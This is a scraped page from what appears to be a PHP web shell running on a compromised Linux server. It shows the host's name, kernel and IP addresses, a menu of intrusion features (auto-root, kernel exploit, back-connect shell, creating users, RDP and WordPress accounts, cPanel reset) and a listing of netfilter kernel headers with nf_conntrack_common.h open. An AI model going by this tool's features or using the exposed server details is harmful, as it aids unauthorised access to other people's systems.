Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.137.177.204
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
linux /
netfilter /
[ HOME SHELL ]
Name
Size
Permission
Action
ipset
[ DIR ]
drwxr-xr-x
nf_conntrack_common.h
4.09
KB
-rw-r--r--
nf_conntrack_ftp.h
375
B
-rw-r--r--
nf_conntrack_sctp.h
595
B
-rw-r--r--
nf_conntrack_tcp.h
1.24
KB
-rw-r--r--
nf_conntrack_tuple_common.h
708
B
-rw-r--r--
nf_nat.h
1.12
KB
-rw-r--r--
nf_tables.h
31.31
KB
-rw-r--r--
nf_tables_compat.h
668
B
-rw-r--r--
nfnetlink.h
2.01
KB
-rw-r--r--
nfnetlink_acct.h
522
B
-rw-r--r--
nfnetlink_compat.h
2.33
KB
-rw-r--r--
nfnetlink_conntrack.h
5.42
KB
-rw-r--r--
nfnetlink_cthelper.h
1.11
KB
-rw-r--r--
nfnetlink_cttimeout.h
2.8
KB
-rw-r--r--
nfnetlink_log.h
2.51
KB
-rw-r--r--
nfnetlink_queue.h
2.88
KB
-rw-r--r--
x_tables.h
4.3
KB
-rw-r--r--
xt_AUDIT.h
655
B
-rw-r--r--
xt_CHECKSUM.h
500
B
-rw-r--r--
xt_CLASSIFY.h
154
B
-rw-r--r--
xt_CONNMARK.h
136
B
-rw-r--r--
xt_CONNSECMARK.h
238
B
-rw-r--r--
xt_CT.h
790
B
-rw-r--r--
xt_DSCP.h
634
B
-rw-r--r--
xt_HMARK.h
841
B
-rw-r--r--
xt_IDLETIMER.h
1.3
KB
-rw-r--r--
xt_LED.h
407
B
-rw-r--r--
xt_LOG.h
579
B
-rw-r--r--
xt_MARK.h
121
B
-rw-r--r--
xt_NFLOG.h
326
B
-rw-r--r--
xt_NFQUEUE.h
716
B
-rw-r--r--
xt_RATEEST.h
305
B
-rw-r--r--
xt_SECMARK.h
486
B
-rw-r--r--
xt_TCPMSS.h
172
B
-rw-r--r--
xt_TCPOPTSTRIP.h
344
B
-rw-r--r--
xt_TEE.h
240
B
-rw-r--r--
xt_TPROXY.h
483
B
-rw-r--r--
xt_addrtype.h
1021
B
-rw-r--r--
xt_bpf.h
340
B
-rw-r--r--
xt_cgroup.h
149
B
-rw-r--r--
xt_cluster.h
311
B
-rw-r--r--
xt_comment.h
167
B
-rw-r--r--
xt_connbytes.h
514
B
-rw-r--r--
xt_connlabel.h
217
B
-rw-r--r--
xt_connlimit.h
512
B
-rw-r--r--
xt_connmark.h
691
B
-rw-r--r--
xt_conntrack.h
2.43
KB
-rw-r--r--
xt_cpu.h
136
B
-rw-r--r--
xt_dccp.h
420
B
-rw-r--r--
xt_devgroup.h
366
B
-rw-r--r--
xt_dscp.h
638
B
-rw-r--r--
xt_ecn.h
673
B
-rw-r--r--
xt_esp.h
355
B
-rw-r--r--
xt_hashlimit.h
1.83
KB
-rw-r--r--
xt_helper.h
125
B
-rw-r--r--
xt_iprange.h
518
B
-rw-r--r--
xt_ipvs.h
588
B
-rw-r--r--
xt_length.h
158
B
-rw-r--r--
xt_limit.h
610
B
-rw-r--r--
xt_mac.h
135
B
-rw-r--r--
xt_mark.h
197
B
-rw-r--r--
xt_multiport.h
658
B
-rw-r--r--
xt_nfacct.h
238
B
-rw-r--r--
xt_osf.h
3.27
KB
-rw-r--r--
xt_owner.h
306
B
-rw-r--r--
xt_physdev.h
469
B
-rw-r--r--
xt_pkttype.h
125
B
-rw-r--r--
xt_policy.h
914
B
-rw-r--r--
xt_quota.h
337
B
-rw-r--r--
xt_rateest.h
774
B
-rw-r--r--
xt_realm.h
157
B
-rw-r--r--
xt_recent.h
966
B
-rw-r--r--
xt_rpfilter.h
257
B
-rw-r--r--
xt_sctp.h
2.22
KB
-rw-r--r--
xt_set.h
1.72
KB
-rw-r--r--
xt_socket.h
382
B
-rw-r--r--
xt_state.h
268
B
-rw-r--r--
xt_statistic.h
653
B
-rw-r--r--
xt_string.h
601
B
-rw-r--r--
xt_tcpmss.h
190
B
-rw-r--r--
xt_tcpudp.h
1.16
KB
-rw-r--r--
xt_time.h
667
B
-rw-r--r--
xt_u32.h
689
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nf_conntrack_common.h
#ifndef _NF_CONNTRACK_COMMON_H #define _NF_CONNTRACK_COMMON_H /* Connection state tracking for netfilter. This is separated from, but required by, the NAT layer; it can also be used by an iptables extension. */ enum ip_conntrack_info { /* Part of an established connection (either direction). */ IP_CT_ESTABLISHED, /* Like NEW, but related to an existing connection, or ICMP error (in either direction). */ IP_CT_RELATED, /* Started a new connection to track (only IP_CT_DIR_ORIGINAL); may be a retransmission. */ IP_CT_NEW, /* >= this indicates reply direction */ IP_CT_IS_REPLY, IP_CT_ESTABLISHED_REPLY = IP_CT_ESTABLISHED + IP_CT_IS_REPLY, IP_CT_RELATED_REPLY = IP_CT_RELATED + IP_CT_IS_REPLY, /* No NEW in reply direction. */ /* Number of distinct IP_CT types. */ IP_CT_NUMBER, /* only for userspace compatibility */ IP_CT_NEW_REPLY = IP_CT_NUMBER, }; #define NF_CT_STATE_INVALID_BIT (1 << 0) #define NF_CT_STATE_BIT(ctinfo) (1 << ((ctinfo) % IP_CT_IS_REPLY + 1)) #define NF_CT_STATE_UNTRACKED_BIT (1 << 6) /* Bitset representing status of connection. */ enum ip_conntrack_status { /* It's an expected connection: bit 0 set. This bit never changed */ IPS_EXPECTED_BIT = 0, IPS_EXPECTED = (1 << IPS_EXPECTED_BIT), /* We've seen packets both ways: bit 1 set. Can be set, not unset. */ IPS_SEEN_REPLY_BIT = 1, IPS_SEEN_REPLY = (1 << IPS_SEEN_REPLY_BIT), /* Conntrack should never be early-expired. */ IPS_ASSURED_BIT = 2, IPS_ASSURED = (1 << IPS_ASSURED_BIT), /* Connection is confirmed: originating packet has left box */ IPS_CONFIRMED_BIT = 3, IPS_CONFIRMED = (1 << IPS_CONFIRMED_BIT), /* Connection needs src nat in orig dir. This bit never changed. */ IPS_SRC_NAT_BIT = 4, IPS_SRC_NAT = (1 << IPS_SRC_NAT_BIT), /* Connection needs dst nat in orig dir. This bit never changed. */ IPS_DST_NAT_BIT = 5, IPS_DST_NAT = (1 << IPS_DST_NAT_BIT), /* Both together. */ IPS_NAT_MASK = (IPS_DST_NAT | IPS_SRC_NAT), /* Connection needs TCP sequence adjusted. */ IPS_SEQ_ADJUST_BIT = 6, IPS_SEQ_ADJUST = (1 << IPS_SEQ_ADJUST_BIT), /* NAT initialization bits. */ IPS_SRC_NAT_DONE_BIT = 7, IPS_SRC_NAT_DONE = (1 << IPS_SRC_NAT_DONE_BIT), IPS_DST_NAT_DONE_BIT = 8, IPS_DST_NAT_DONE = (1 << IPS_DST_NAT_DONE_BIT), /* Both together */ IPS_NAT_DONE_MASK = (IPS_DST_NAT_DONE | IPS_SRC_NAT_DONE), /* Connection is dying (removed from lists), can not be unset. */ IPS_DYING_BIT = 9, IPS_DYING = (1 << IPS_DYING_BIT), /* Connection has fixed timeout. */ IPS_FIXED_TIMEOUT_BIT = 10, IPS_FIXED_TIMEOUT = (1 << IPS_FIXED_TIMEOUT_BIT), /* Conntrack is a template */ IPS_TEMPLATE_BIT = 11, IPS_TEMPLATE = (1 << IPS_TEMPLATE_BIT), /* Conntrack is a fake untracked entry. Obsolete and not used anymore */ IPS_UNTRACKED_BIT = 12, IPS_UNTRACKED = (1 << IPS_UNTRACKED_BIT), /* Conntrack got a helper explicitly attached via CT target. */ IPS_HELPER_BIT = 13, IPS_HELPER = (1 << IPS_HELPER_BIT), /* Be careful here, modifying these bits can make things messy, * so don't let users modify them directly. */ IPS_UNCHANGEABLE_MASK = (IPS_NAT_DONE_MASK | IPS_NAT_MASK | IPS_EXPECTED | IPS_CONFIRMED | IPS_DYING | IPS_SEQ_ADJUST | IPS_TEMPLATE), __IPS_MAX_BIT = 14, }; /* Connection tracking event types */ enum ip_conntrack_events { IPCT_NEW, /* new conntrack */ IPCT_RELATED, /* related conntrack */ IPCT_DESTROY, /* destroyed conntrack */ IPCT_REPLY, /* connection has seen two-way traffic */ IPCT_ASSURED, /* connection status has changed to assured */ IPCT_PROTOINFO, /* protocol information has changed */ IPCT_HELPER, /* new helper has been set */ IPCT_MARK, /* new mark has been set */ IPCT_SEQADJ, /* sequence adjustment has changed */ IPCT_NATSEQADJ = IPCT_SEQADJ, IPCT_SECMARK, /* new security mark has been set */ IPCT_LABEL, /* new connlabel has been set */ }; enum ip_conntrack_expect_events { IPEXP_NEW, /* new expectation */ IPEXP_DESTROY, /* destroyed expectation */ }; /* expectation flags */ #define NF_CT_EXPECT_PERMANENT 0x1 #define NF_CT_EXPECT_INACTIVE 0x2 #define NF_CT_EXPECT_USERSPACE 0x4 #endif /* _NF_CONNTRACK_COMMON_H */
Close